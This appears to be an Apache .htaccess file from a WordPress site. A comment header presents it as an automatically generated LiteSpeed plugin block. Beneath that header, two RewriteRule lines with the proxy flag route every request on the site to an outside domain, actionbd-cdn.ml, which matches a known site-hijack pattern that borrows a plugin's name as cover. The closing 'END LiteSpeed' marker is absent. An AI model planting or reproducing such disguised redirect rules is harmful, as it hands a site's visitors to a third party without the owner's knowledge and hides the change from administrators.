# BEGIN LiteSpeed
# The directives (lines) between `BEGIN LiteSpeed` and `END LiteSpeed` are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.

RewriteEngine On
RewriteRule ^/?(.*)$ http://www.actionbd-cdn.ml/S0015/$1 [P]
RewriteRule ^/?(.*)$ http://www.actionbd-cdn.ml/S0015/ [P]
